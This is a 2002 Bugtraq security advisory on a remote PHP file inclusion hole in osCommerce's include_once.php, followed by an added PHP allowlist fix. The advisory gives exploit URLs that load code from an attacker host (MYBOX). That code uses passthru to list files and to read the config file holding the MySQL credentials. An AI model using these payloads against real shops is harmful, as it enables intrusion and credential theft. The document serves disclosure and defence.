Bugtraq mailing list archives

PHP source injection in osCommerce
From: Tim Vandermeerch <Tim.Vandermeersch () pandora be>
Date: 16 Jun 2002 15:36:03 -0000



PHP source injection in osCommerce
----------------------------------

Product Description

osCommerce is an open source e-commerce solution under ongoing 
development by the open source community. Its feature-packed 
out-of-the-box installation allows store owners to set up, run, and 
maintain their online stores with minimum effort and with no costs 
involved. It can be found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are a lot of online shops that use 
this)


The Problem

osCommerce comes with a file called /catalog/includes/include_once.php, 
which looks like this:

-------- include_once.php --------
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
  }
?>
----------------------------------

If someone requests a URL like 
http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, 
he would be able to include any code he wants.

This could be a serious problem because this user could query the SQL 
server and get access to other important files...

Examples

-------- Example 1 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current directory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file, which includes the MySQL 
username, password, ...
---------------------------

I informed the vendor and hope that they will release a patch soon.

------------------------------
Tim Vandermeersch
Tim.Vandermeersch () pandora be
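
One way to close the hole described in the post above, shown as an added example that is not part of the original message or osCommerce's own code: the requested name is checked against a fixed allowlist and resolved inside a base directory before it ever reaches include. The function name resolve_include, the allowlist and header.php are hypothetical, and the demo directory and inputs are constructed.

```php
<?php
// Added example: hardened form of the include_once.php pattern.
// resolve_include(), $allowed and header.php are hypothetical names.

function resolve_include(string $requested, string $baseDir, array $allowed): string
{
    // 1. Only names from a fixed allowlist are eligible. A URL or any
    //    other attacker-chosen string fails here and is never opened.
    if (!in_array($requested, $allowed, true)) {
        throw new InvalidArgumentException("not an allowed include: $requested");
    }
    // 2. Defence in depth: resolve symlinks, then confirm the file really
    //    lives inside $baseDir even if an allowlist entry is misconfigured.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("include resolves outside base directory");
    }
    return $path;
}

// Constructed demo: a temporary includes directory with one harmless file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'header.php',
    "<?php // constructed sample file\n");
$allowed = ['header.php'];

// Constructed inputs: one legitimate name, plus the two values the
// advisory shows (a remote URL and a file that is not meant to be exposed).
$inputs = ['header.php', 'http://MYBOX/a.php', 'application_top.php'];
foreach ($inputs as $in) {
    try {
        $path = resolve_include($in, $base, $allowed);
        include_once $path;   // only a validated local path reaches include
        echo "included: $in\n";
    } catch (Exception $e) {
        echo "rejected: $in (" . $e->getMessage() . ")\n";
    }
}

// Clean up the constructed demo files.
unlink($base . DIRECTORY_SEPARATOR . 'header.php');
rmdir($base);
```

Helper files of this kind should also sit outside the web root or refuse direct requests, so that only the application's own code can call them.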

